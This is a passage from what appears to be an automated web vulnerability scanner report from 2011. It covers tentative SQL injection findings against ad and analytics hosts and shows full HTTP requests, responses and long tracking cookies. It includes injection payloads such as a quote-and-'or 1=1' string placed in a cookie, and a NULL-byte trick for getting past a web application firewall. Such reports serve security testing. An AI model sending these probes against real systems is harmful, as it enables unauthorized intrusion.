rdrlst=4320pahlkze3o0000000i3n07144qlkze3o0000000i3n07157olkxlm50000000q3n0713y7lkze3o0000000i3n0715sklkkpqq000000133n070hsnlkze3o0000000i3n0712nslkxrxz0000000k3n0712gdlkkyy00000000z3n070morlkkxrb000000103n0714k6lkxlm50000000q3n070w35lkze3o0000000i3n0713pylkze3o0000000i3n0714rwlkxlm50000000q3n071628lkze3y0000000g3n07132dlkzsmp000000093n0714khlkxlm50000000q3n071196lkkkbe000000193n0713x4lkxrxz0000000k3n0713qmlkze3y0000000g3n071195lkkpqh000000143n071194lkkjj40000001a3n0716nulkxlm50000000q3n0713q8lkze3y0000000g3n071193lkkplo000000163n070p46lkkpqq000000133n071192lkkpke000000183n070zg4lkze3y0000000g3n0713qwlkze4r0000000f3n07144elkze3o0000000i3n0710poljyxb40000001l3n070e6llkl0r50000000w3n07106llkzt2k000000083n07138olkxrxz0000000k3n0716dnlkze3o0000000i3n0716y4ll1dpj000000033n03167ulkxq410000000l3n0714qllkxlm50000000q3n07159olk8fax0000001g3n0715halkxlm50000000q3n070m0plkkxrb000000103n0716e6lkxnbq0000000p3n0713zblkze3y0000000g3n0714xnlkxlm50000000q3n0716dxlkze3o0000000i3n071391lkxrxz0000000k3n071672lkkxrb000000103n0715zhlkze3y0000000g3n070ycrlkncow0000000u3n070okclkze3o0000000i3n07158mlkze3o0000000i3n071015lkze3y0000000g3n0713lelkxrxz0000000k3n0713yolkze3o0000000i3n070ojulkze3o0000000i3n071240lkxrxz0000000k3n0714ozlkxlm50000000q3n0714bmlkxrxz0000000k3n071590lkzsm20000000a3n0714j7lkxlm50000000q3n0714bzlkxlm50000000q3n0711pjlkxrxz0000000k3n070p01lkze3o0000000i3n0715holkxlm50000000q3n070m7alkkxrb000000103n0713mklkxrxz0000000k3n07101ulkze3o0000000i3n0712zglkxrxz0000000k3n0713lxlkxrxz0000000k3n070zp4lkze3o0000000i3n07148ilkxlm50000000q3n070xvclkze3o0000000i3n0716sjll1dpj000000033n0312yxlkxrxz0000000k3n0715iglkxq0l0000000m3n0713n7lkze3y0000000g3n0716s2lkxpyu0000000n3n0714hplkxlm50000000q3n070znmlk34620000001j3n0714hclkxlm50000000q3n070wd7lkze3o0000000i3n07102plkxrxz0000000k3n0710tylkkpku000000173n070p1alkze3o0000000i3n0700bvlk9pe80000001f3n0715xylk60qe0000001i3n0710lxlkxrxz0000000k3n07103blkxrxz0000000k3n0710telkd7nq0000001d3n0716rslkxppm0000000o3n070c9slk9pe80000001f3n0713mxlkze3o0000000i3n0712emlkze3o0000000i3n0710rdlkdkly0000001b3n070z9zlkze3y0000000g3n07163plkxlm50000000q3n070z9xlkze3o0000000i3n070m40lkkxrb000000103n070zqylkxrxz0000000k3n070mjelkkxrb000000103n0712qnlkkplt000000153n0712x6lkxrxz0000000k3n0714e9lkze3o0000000i3n071342lkze3y0000000g3n0716aulkze3o0000000i3n0716atlkxlm50000000q3n071203lkb5u20000001e3n07163clkxlm50000000q3n070afqlkze3o0000000i3n070o0vlkkpqx000000123n070z2ilkkxrb000000103n07; sglst=2280sbpelkxlm5026sw00f3m000k00500dsnlkxlm503s3e00q3n070k0q50qarllkxlm503s3e00q3n070k0q50qcg5lkxlm5026sw00q3n070k0q50q9rslkkpke0go550183n070k0r518am5lkkxr8002zw0113n070k0r511cd4lkxlm5026sw00f3m000k00500crglkxlm5026sw00q3n070k0q50qcnolkxlm5026sw00q3n070k0q50qabelkxlm5026sw00q3n070k0q50qdd8lkxlm5026sw00f3m000k00500cy2lkxlm5026sw00q3n070k0q50qaoplkb5u209jqc0063e000j00500cnxlkxlm503s3e00q3n070k0q50qe3qll1dpj000000033n030k03503bq3lkxlm5026sw00q3n070k0q50qbvplkxlm5026sw00f3m000k00500aoilkxlm503s3e00n3n000k00500942lkb5u20mfs300o3l000k005008ndlkb5u20mfs300o3l000k005009ullkxlm503s3e00n3n000k00500bvclkxlm5026sw00q3n070k0q50qc5flkxlm5026sw00q3n070k0q50q56blkb5u20mfs300o3l000k00500bjqlkxlm5026sw00q3n070k0q50qawklkxlm5026sw00q3n070k0q50qasulkb5u209jqc0063e000j00500crplkxlm503s3e00n3n000k00500asqlkxlm5026sw00q3n070k0q50qc5rlkov6e0000000t3n070k0r50taw8lkxlm503s3e00q3n070k0q50qc60lkxlm5026sw00q3n070k0q50qdc4lkxlm5026sw00q3n070k0q50qd26lkxlm5026sw00q3n070k0q50qdnjlkxlm503s3e00q3n070k0q50qcbclkxlm5026sw00q3n070k0q50qc85lkxlm5026sw00q3n070k0q50qcsslkxlm503s3e00q3n070k0q50qc80lkb5u209jqc0063e000j00500ag2lkd7nq0o68m01d3n070k0r51ac1elkxlm5026sw00q3n070k0q50qc81lkkpke0cw1r00i3l000k005009grlkxlm5026sw00q3n070k0q50qc8flkxlm5026sw00q3n070k0q50qa6slkkpke0cw1r00i3l000k00500dnalkxlm5026sw00q3n070k0q50q9z6lkxlm5026sw00q3n070k0q50qdbtlkxlm5026sw00q3n070k0q50q9q4lkxlm5026sw00q3n070k0q50qdyllkxlm5026sw00q3n070k0q50q0kllklhm40c4010053l000k005009q5lkb5u20mfs300o3l000k00500b3zlkxlm503s3e00n3n000k005000t7ljyxb412gl801l3n070k0r51adgflkkpke0f2un0183n070k0r5189mjlkxlm5026sw00f3m000k00500bo0lkb5u20q7vh01b3n000k00500bo1lkkyy00cmo50093l000k005009pglkxlm5026sw00q3n070k0q50qcwalkxlm5026sw00q3n070k0q50qd86lklhm40c4010053l000k00500d84lkxlm5026sw00q3n070k0q50qdqllkxlm5026sw00q3n070k0q50qdz3lkxlm5026sw00f3m000k00500cm6lkxlm5026sw00q3n070k0q50qcxdlkxlm503s3e00q3n070k0q50q719lkb5u20omkz00w3n070k0q50r71alkkpke0cw1r00i3l000k00500ctplkxlm5026sw00q3n070k0q50qcc3lkxlm5026sw00q3n070k0q50qdgilkb5u209jqc0063e000j00500cthlkxlm5026sw00q3n070k0q50q4wclkb5u20q7vh00t3n000k005005mrlkb5u20mfs300o3l000k00500a0ulkxlm503s3e00n3n000k00500arilkxlm5026sw00f3m000k00500e0yll1dpj000000033n030k03503bwjlkkyy00gerj00z3n070k0r50zcbplkxlm5026sw00q3n070k0q50q9gelkxlm503s3e00n3n000k00500; vstcnt=417k020o01dfngheqnlsvaqf150v10l20r1w4exqe103210524qhoq103210524slly127p20f20g24exp6103210e249v4u10pj10e24ru4y103210722te10tq10a24f69z103210f24n86o103210d24pq44103210a24eflo218e104203210724na8i103210e24eyja103210e24f204103210524mqca103210e24nsyl103210f24l16a218e10f203210l24fz24103210924bgpn103210524o3dr103210l24cj2d103210224e1a9103210l24gqhl103210924d3rk10pj10m23sti21hj10a203210e24g197103210524ns52103210l24fqsv103210l24nnav103210f22wb11m520l20m24uzg6218e100203220020324tfmw103210b24flbl103210424qpgs103210324tc6l103210e24f5tg103210324tmhw103210924q8ci103210l24m4sm103210524elor218e10l203210m24uu1v103210m24f9wk103210i24jxig103210f24fvio218e20e20f203210f24uzpw218e10f203210l24eo2u103210624e8bw10321082496o0103210l24fsuv103210924fduc218e10a203210e24ef19103210l24uzdp103210b24dret103210724e9pa10321042451gt10pj10e24styu103210924cnyl103210g24er21103210m24o2lt103210a24fj52103210924m1v2103210a23eoh127p10l24f7qr218e108203210924fgv9218e108203210a24qnab103210023l4f103210a24kd6k103210c24hqyp103210i2

Response 2

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: adh="1lkkxr8160a4ka20103r018twhJPTGt00gg5452rf011et018qzlZAsw500gg2f52rc011qy047t/iBG61e00gej07rxkxOK2C00gegz7pwZhKq0500gef6mLlY5BlsL003xfa54rg012pw01RcyZZBCFM00ei4o4l12012pw01Ra2uRD8cN00ei2y58j30136z01Q02eRPDiG00eh4b4tmb012v701QWYNRLUMp00egcp4tm3012v701QWJzhCSHC00egcf4w5q011qy01mLbKRCxkE003xf64qj9010gs02QopkpBIIf0002zwOyHUBHBSQ000000"; Version=1; Domain=media6degrees.com; Max-Age=15552000; Path=/
Set-Cookie: clid=2ljtllp01170xrd52zkwjuxh17v9901p3n080k0s51b; Domain=media6degrees.com; Expires=Mon, 07-Nov-2011 16:08:58 GMT; Path=/
Set-Cookie: orblb=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rdrlst=4330pahlkze3o0000000j3n08157olkxlm50000000r3n08144qlkze3o0000000j3n0813y7lkze3o0000000j3n080hsnlkze3o0000000j3n0815sklkkpqq000000143n0812nslkxrxz0000000l3n0812gdlkkyy0000000103n080morlkkxrb000000113n0814k6lkxlm50000000r3n080w35lkze3o0000000j3n0813pylkze3o0000000j3n0814rwlkxlm50000000r3n081628lkze3y0000000h3n08132dlkzsmp0000000a3n0814khlkxlm50000000r3n081196lkkkbe0000001a3n0813x4lkxrxz0000000l3n08106sll1guy000000013n0113qmlkze3y0000000h3n081195lkkpqh000000153n081194lkkjj40000001b3n0816nulkxlm50000000r3n0813q8lkze3y0000000h3n081193lkkplo000000173n081192lkkpke000000193n080p46lkkpqq000000143n080zg4lkze3y0000000h3n08144elkze3o0000000j3n0813qwlkze4r0000000g3n0810poljyxb40000001m3n08106llkzt2k000000093n080e6llkl0r50000000x3n0816dnlkze3o0000000j3n08138olkxrxz0000000l3n0816y4ll1dpj000000043n04167ulkxq410000000m3n08159olk8fax0000001h3n0814qllkxlm50000000r3n0815halkxlm50000000r3n080m0plkkxrb000000113n0816e6lkxnbq0000000q3n0813zblkze3y0000000h3n0814xnlkxlm50000000r3n0816dxlkze3o0000000j3n081391lkxrxz0000000l3n0815zhlkze3y0000000h3n081672lkkxrb000000113n080ycrlkncow0000000v3n080okclkze3o0000000j3n08158mlkze3o0000000j3n081015lkze3y0000000h3n0813lelkxrxz0000000l3n0813yolkze3o0000000j3n080ojulkze3o0000000j3n081240lkxrxz0000000l3n0814ozlkxlm50000000r3n0814bmlkxrxz0000000l3n081590lkzsm20000000b3n0814j7lkxlm50000000r3n0814bzlkxlm5000
...[SNIP]...

1.14. http://m.trb.com/b/ss/tribglobal/1/H.22.1/s59644513663370 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://m.trb.com
Path:   /b/ss/tribglobal/1/H.22.1/s59644513663370

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b/ss/tribglobal/1%00'/H.22.1/s59644513663370?AQB=1&ndh=1&t=11%2F4%2F2011%2010%3A4%3A53%203%20300&vmt=4D4DDB8E&ns=tribuneinteractive&pageName=zap2it%20-%20Home.&g=http%3A%2F%2Fwww.zap2it.com%2F&cc=USD&ch=zap2it%3A&server=zap2it.com&events=event5&h1=zap2it%3AHome&h2=Home&h4=Home&v20=zap2it&v21=Home&v25=First%20Visit&c30=N&c33=Wednesday&c34=8%3A30AM&c35=Weekday&c38=Home&c44=zap-2010homelayout&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1066&bh=964&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: m.trb.com
Proxy-Connection: keep-alive
Referer: http://www.zap2it.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26DF7ADB851D1C52-4000012840250C07[CE]

Response 1

HTTP/1.1 404 Not Found
Date: Wed, 11 May 2011 16:13:17 GMT
Server: Omniture DC/2.0.0
Content-Length: 404
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss/tribglobal/1 was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss/tribglobal/1%00''/H.22.1/s59644513663370?AQB=1&ndh=1&t=11%2F4%2F2011%2010%3A4%3A53%203%20300&vmt=4D4DDB8E&ns=tribuneinteractive&pageName=zap2it%20-%20Home.&g=http%3A%2F%2Fwww.zap2it.com%2F&cc=USD&ch=zap2it%3A&server=zap2it.com&events=event5&h1=zap2it%3AHome&h2=Home&h4=Home&v20=zap2it&v21=Home&v25=First%20Visit&c30=N&c33=Wednesday&c34=8%3A30AM&c35=Weekday&c38=Home&c44=zap-2010homelayout&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1066&bh=964&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: m.trb.com
Proxy-Connection: keep-alive
Referer: http://www.zap2it.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26DF7ADB851D1C52-4000012840250C07[CE]

Response 2

HTTP/1.1 404 Not Found
Date: Wed, 11 May 2011 16:13:17 GMT
Server: Omniture DC/2.0.0
xserver: www369
Content-Length: 0
Content-Type: text/html


1.15. http://map.media6degrees.com/orbserv/hbpix [rdrlst cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://map.media6degrees.com
Path:   /orbserv/hbpix

Issue detail

The rdrlst cookie appears to be vulnerable to SQL injection attacks. The payloads 11462865'%20or%201%3d1--%20 and 11462865'%20or%201%3d2--%20 were each submitted in the rdrlst cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /orbserv/hbpix?pixId=6511&pcv=42&cb=9409585524&topHref=http%3A%2F%2Fsaturdayfinds.blogspot.com%2F2011%2F05%2Fanother-pink-eye-candy-saturday.html HTTP/1.1
Host: map.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://saturdayfinds.blogspot.com/2011/05/another-pink-eye-candy-saturday.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipinfo=2lkkjj40zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrf00; acs=016020a0e0f0g0h1ljtllpxzt1166tcxzt1tr37xzt1tr37xzt1166tcxzt117rw8; adh="1lkkxr8160852rc011qy047t/iBG61e00gej07rxkxOK2C00gegz7pwZhKq0500gef6mLlY5BlsL003xfa54rg012pw01RcyZZBCFM00ei4o4l12012pw01Ra2uRD8cN00ei2y58j30136z01Q02eRPDiG00eh4b4tmb012v701QWYNRLUMp00egcp4tm3012v701QWJzhCSHC00egcf4w5q011qy01mLbKRCxkE003xf64qj9010gs02QopkpBIIf0002zwOyHUBHBSQ000000"; clid=2ljtllp01170xrd52zkwjuxh17rw801l3n040k0o517; rdrlst=4300pahlkze3o0000000f3n04157olkxlm50000000n3n04144qlkze3o0000000f3n0413y7lkze3o0000000f3n040hsnlkze3o0000000f3n0415sklkkpqq000000103n0412nslkxrxz0000000h3n0412gdlkkyy00000000w3n040morlkkxrb0000000x3n0414k6lkxlm50000000n3n040w35lkze3o0000000f3n0413pylkze3o0000000f3n0414rwlkxlm50000000n3n041628lkze3y0000000d3n04132dlkzsmp000000063n0414khlkxlm50000000n3n041196lkkkbe000000163n0413x4lkxrxz0000000h3n0413qmlkze3y0000000d3n041195lkkpqh000000113n041194lkkjj4000000173n0416nulkxlm50000000n3n0413q8lkze3y0000000d3n041193lkkplo000000133n041192lkkpke000000153n040p46lkkpqq000000103n040zg4lkze3y0000000d3n04144elkze3o0000000f3n0413qwlkze4r0000000c3n0410poljyxb40000001i3n04106llkzt2k000000053n040e6llkl0r50000000t3n0416dnlkze3o0000000f3n04138olkxrxz0000000h3n04167ulkxq410000000i3n04159olk8fax0000001d3n0414qllkxlm50000000n3n0415halkxlm50000000n3n040m0plkkxrb0000000x3n0416e6lkxnbq0000000m3n0413zblkze3y0000000d3n0414xnlkxlm50000000n3n0416dxlkze3o0000000f3n041391lkxrxz0000000h3n0415zhlkze3y0000000d3n041672lkkxrb0000000x3n040ycrlkncow0000000r3n04158mlkze3o0000000f3n040okclkze3o0000000f3n041015lkze3y0000000d3n0413lelkxrxz0000000h3n0413yolkze3o0000000f3n040ojulkze3o0000000f3n041240lkxrxz0000000h3n0414ozlkxlm50000000n3n0414bmlkxrxz0000000h3n041590lkzsm2000000073n0414j7lkxlm50000000n3n0414bzlkxlm50000000n3n0411pjlkxrxz0000000h3n040p01lkze3o0000000f3n0415holkxlm50000000n3n040m7alkkxrb0000000x3n0413mklkxrxz0000000h3n04101ulkze3o0000000f3n0412zglkxrxz0000000h3n0413lxlkxrxz0000000h3n040zp4lkze3o0000000f3n04148ilkxlm50000000n3n040xvclkze3o0000000f3n0412yxlkxrxz0000000h3n0415iglkxq0l0000000j3n0413n7lkze3y0000000d3n0416s2lkxpyu0000000k3n0414hplkxlm50000000n3n040znmlk34620000001g3n0414hclkxlm50000000n3n040wd7lkze3o0000000f3n04102plkxrxz0000000h3n0410tylkkpku000000143n040p1alkze3o0000000f3n0400bvlk9pe80000001c3n0415xylk60qe0000001f3n0410lxlkxrxz0000000h3n04103blkxrxz0000000h3n0410telkd7nq0000001a3n0416rslkxppm0000000l3n040c9slk9pe80000001c3n0413mxlkze3o0000000f3n0412emlkze3o0000000f3n0410rdlkdkly000000183n040z9zlkze3y0000000d3n04163plkxlm50000000n3n040z9xlkze3o0000000f3n040m40lkkxrb0000000x3n040zqylkxrxz0000000h3n040mjelkkxrb0000000x3n0412qnlkkplt000000123n0414e9lkze3o0000000f3n0412x6lkxrxz0000000h3n041342lkze3y0000000d3n0416aulkze3o0000000f3n0416atlkxlm50000000n3n041203lkb5u20000001b3n04163clkxlm50000000n3n040afqlkze3o0000000f3n040o0vlkkpqx0000000z3n040z2ilkkxrb0000000x3n0411462865'%20or%201%3d1--%20; sglst=2260sbpelkxlm5026sw00f3m000k00500dsnlkxlm5026sw00n3n040k0n50narllkxlm5026sw00n3n040k0n50ncg5lkxlm5026sw00n3n040k0n50n9rslkkpke0f2un0153n040k0o515am5lkkxr8002zw00y3n040k0o50ycd4lkxlm5026sw00f3m000k00500crglkxlm5026sw00n3n040k0n50ncnolkxlm5026sw00n3n040k0n50nabelkxlm5026sw00n3n040k0n50ndd8lkxlm5026sw00f3m000k00500cy2lkxlm5026sw00n3n040k0n50naoplkb5u209jqc0063e000j00500cnxlkxlm501sim00n3n040k0n50nbq3lkxlm5026sw00n3n040k0n50naoilkxlm501sim00n3n040k0n50nbvplkxlm5026sw00f3m000k00500942lkb5u20mfs300o3l000k005009ullkxlm501sim00n3n040k0n50n8ndlkb5u20mfs300o3l000k00500bvclkxlm5026sw00n3n040k0n50nc5flkxlm5026sw00n3n040k0n50n56blkb5u20mfs300o3l000k00500bjqlkxlm5026sw00n3n040k0n50nawklkxlm5026sw00n3n040k0n50nasulkb5u209jqc0063e000j00500crplkxlm501sim00n3n040k0n50nasqlkxlm5026sw00n3n040k0n50nc5rlkov6e0000000q3n040k0o50qaw8lkxlm5026sw00n3n040k0n50nc60lkxlm5026sw00n3n040k0n50ndc4lkxlm5026sw00n3n040k0n50nd26lkxlm5026sw00n3n040k0n50ndnjlkxlm5026sw00n3n040k0n50ncbclkxlm5026sw00n3n040k0n50nc85lkxlm5026sw00n3n040k0n50ncsslkxlm5026sw00n3n040k0n50nc80lkb5u209jqc0063e000j00500ag2lkd7nq0o5u701a3n040k0o517c1elkxlm5026sw00n3n040k0n50nc81lkkpke0cw1r00i3l000k005009grlkxlm5026sw00n3n040k0n50nc8flkxlm5026sw00n3n040k0n50na6slkkpke0cw1r00i3l000k00500dnalkxlm5026sw00n3n040k0n50n9z6lkxlm5026sw00n3n040k0n50ndbtlkxlm5026sw00n3n040k0n50ndyllkxlm5026sw00n3n040k0n50n0kllklhm40c4010053l000k005009q4lkxlm5026sw00n3n040k0n50nb3zlkxlm501sim00n3n040k0n50n9q5lkb5u20mfs300o3l000k005009mjlkxlm5026sw00f3m000k00500dgflkkpke0f2un0153n040k0o5150t7ljyxb412g6t01i3n040k0o517bo0lkb5u20o8ap01b3n040k0o517bo1lkkyy00cmo50093l000k005009pglkxlm5026sw00n3n040k0n50nd86lklhm40c4010053l000k00500cwalkxlm5026sw00n3n040k0n50ndqllkxlm5026sw00n3n040k0n50nd84lkxlm5026sw00n3n040k0n50ndz3lkxlm5026sw00f3m000k00500cm6lkxlm5026sw00n3n040k0n50ncxdlkxlm5026sw00n3n040k0n50n719lkb5u20omkz00t3n040k0n50o71alkkpke0cw1r00i3l000k00500ctplkxlm5026sw00n3n040k0n50ncc3lkxlm5026sw00n3n040k0n50ndgilkb5u209jqc0063e000j00500cthlkxlm5026sw00n3n040k0n50n4wclkb5u20o8ap00t3n040k0n50oa0ulkxlm501sim00n3n040k0n50n5mrlkb5u20mfs300o3l000k00500arilkxlm5026sw00f3m000k00500cbplkxlm5026sw00n3n040k0n50nbwjlkkyy00eth100w3n040k0o50w9gelkxlm501sim00n3n040k0n50n; vstcnt=417k010r1w4exqe103210524qhoq103210524slly127p20f20g24exp6103210e249v4u10pj10e24ru4y103210722te10tq10a24f69z103210f24n86o103210d24pq44103210a24eflo218e104203210724na8i103210e24eyja103210e24f204103210524mqca103210e24nsyl103210f24l16a218e10f203210l24fz24103210924o3dr103210l24bgpn103210524cj2d103210224gqhl103210924e1a9103210l23sti21hj10a203210e24d3rk10pj10m24g197103210524ns52103210l24fqsv103210l24nnav103210f22wb11m520l20m24uzg6218e100203220020324tfmw103210b24flbl103210424qpgs103210324tc6l103210e24f5tg103210324tmhw103210924q8ci103210l24m4sm103210524elor218e10l203210m24uu1v103210m24f9wk103210i24jxig103210f24fvio218e20e20f203210f24uzpw218e10f203210l24eo2u103210624e8bw10321082496o0103210l24fsuv103210924fduc218e10a203210e24ef19103210l24dret103210724uzdp103210b24e9pa103210424cnyl103210g24styu10321092451gt10pj10e24er21103210m24fj52103210924o2lt103210a23eoh127p10l24m1v2103210a24f7qr218e108203210924qnab103210024fgv9218e108203210a24hqyp103210i24kd6k103210c23l4f103210a2

Response 1

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: acs=016020a0e0f0g0h1ljtllpxzt117u4nxzt1tr37xzt1tr37xzt117u4nxzt117rw8; Domain=media6degrees.com; Expires=Mon, 07-Nov-2011 15:44:37 GMT; Path=/
Set-Cookie: adh="1lkkxr8160852rc011qy047t/iBG61e00gej07rxkxOK2C00gegz7pwZhKq0500gef6mLlY5BlsL003xfa54rg012pw01RcyZZBCFM00ei4o4l12012pw01Ra2uRD8cN00ei2y58j30136z01Q02eRPDiG00eh4b4tmb012v701QWYNRLUMp00egcp4tm3012v701QWJzhCSHC00egcf4w5q011qy01mLbKRCxkE003xf64qj9010gs02QopkpBIIf0002zwOyHUBHBSQ000000"; Version=1; Domain=media6degrees.com; Max-Age=15552000; Path=/
Set-Cookie: clid=2ljtllp01170xrd52zkwjuxh17u4n01m3n050k0p518; Domain=media6degrees.com; Expires=Mon, 07-Nov-2011 15:44:37 GMT; Path=/
Set-Cookie: orblb=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rdrlst=40110tell1fqc000000013n01; Domain=media6degrees.com; Expires=Mon, 07-Nov-2011 15:44:37 GMT; Path=/
Set-Cookie: sglst=2280sbpelkxlm5026sw00f3m000k00500dsnlkxlm503u4700o3n050k0o50oarllkxlm503u4700o3n050k0o50ocg5lkxlm5026sw00o3n050k0o50o9rslkkpke0gq5y0163n050k0p516am5lkkxr8002zw00z3n050k0p50zcd4lkxlm5026sw00f3m000k00500crglkxlm5026sw00o3n050k0o50ocnolkxlm5026sw00o3n050k0o50oabelkxlm5026sw00o3n050k0o50odd8lkxlm5026sw00f3m000k00500cy2lkxlm5026sw00o3n050k0o50oaoplkb5u209jqc0063e000j00500cnxlkxlm503u4700o3n050k0o50oe3qll1fqc000000013n010k01501bq3lkxlm5026sw00o3n050k0o50obvplkxlm5026sw00f3m000k00500aoilkxlm503u4700n3n000k00500942lkb5u20mfs300o3l000k005008ndlkb5u20mfs300o3l000k005009ullkxlm503u4700n3n000k00500bvclkxlm5026sw00o3n050k0o50oc5flkxlm5026sw00o3n050k0o50o56blkb5u20mfs300o3l000k00500bjqlkxlm5026sw00o3n050k0o50oawklkxlm5026sw00o3n050k0o50oasulkb5u209jqc0063e000j00500crplkxlm503u4700n3n000k00500asqlkxlm5026sw00o3n050k0o50oc5rlkov6e0000000r3n050k0p50raw8lkxlm503u4700o3n050k0o50oc60lkxlm5026sw00o3n050k0o50odc4lkxlm5026sw00o3n050k0o50od26lkxlm5026sw00o3n050k0o50odnjlkxlm503u4700o3n050k0o50ocbclkxlm5026sw00o3n050k0o50oc85lkxlm5026sw00o3n050k0o50ocsslkxlm503u4700o3n050k0o50oc80lkb5u209jqc0063e000j00500ag2lkd7nq0o82m01b
...[SNIP]...

Request 2

GET /orbserv/hbpix?pixId=6511&pcv=42&cb=9409585524&topHref=http%3A%2F%2Fsaturdayfinds.blogspot.com%2F2011%2F05%2Fanother-pink-eye-candy-saturday.html HTTP/1.1
Host: map.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://saturdayfinds.blogspot.com/2011/05/another-pink-eye-candy-saturday.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipinfo=2lkkjj40zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrf00; acs=016020a0e0f0g0h1ljtllpxzt1166tcxzt1tr37xzt1tr37xzt1166tcxzt117rw8; adh="1lkkxr8160852rc011qy047t/iBG61e00gej07rxkxOK2C00gegz7pwZhKq0500gef6mLlY5BlsL003xfa54rg012pw01RcyZZBCFM00ei4o4l12012pw01Ra2uRD8cN00ei2y58j30136z01Q02eRPDiG00eh4b4tmb012v701QWYNRLUMp00egcp4tm3012v701QWJzhCSHC00egcf4w5q011qy01mLbKRCxkE003xf64qj9010gs02QopkpBIIf0002zwOyHUBHBSQ000000"; clid=2ljtllp01170xrd52zkwjuxh17rw801l3n040k0o517; rdrlst=4300pahlkze3o0000000f3n04157olkxlm50000000n3n04144qlkze3o0000000f3n0413y7lkze3o0000000f3n040hsnlkze3o0000000f3n0415sklkkpqq000000103n0412nslkxrxz0000000h3n0412gdlkkyy00000000w3n040morlkkxrb0000000x3n0414k6lkxlm50000000n3n040w35lkze3o0000000f3n0413pylkze3o0000000f3n0414rwlkxlm50000000n3n041628lkze3y0000000d3n04132dlkzsmp000000063n0414khlkxlm50000000n3n041196lkkkbe000000163n0413x4lkxrxz0000000h3n0413qmlkze3y0000000d3n041195lkkpqh000000113n041194lkkjj4000000173n0416nulkxlm50000000n3n0413q8lkze3y0000000d3n041193lkkplo000000133n041192lkkpke000000153n040p46lkkpqq000000103n040zg4lkze3y0000000d3n04144elkze3o0000000f3n0413qwlkze4r0000000c3n0410poljyxb40000001i3n04106llkzt2k000000053n040e6llkl0r50000000t3n0416dnlkze3o0000000f3n04138olkxrxz0000000h3n04167ulkxq410000000i3n04159olk8fax0000001d3n0414qllkxlm50000000n3n0415halkxlm50000000n3n040m0plkkxrb0000000x3n0416e6lkxnbq0000000m3n0413zblkze3y0000000d3n0414xnlkxlm50000000n3n0416dxlkze3o0000000f3n041391lkxrxz0000000h3n0415zhlkze3y0000000d3n041672lkkxrb0000000x3n040ycrlkncow0000000r3n04158mlkze3o0000000f3n040okclkze3o0000000f3n041015lkze3y0000000d3n0413lelkxrxz0000000h3n0413yolkze3o0000000f3n040ojulkze3o00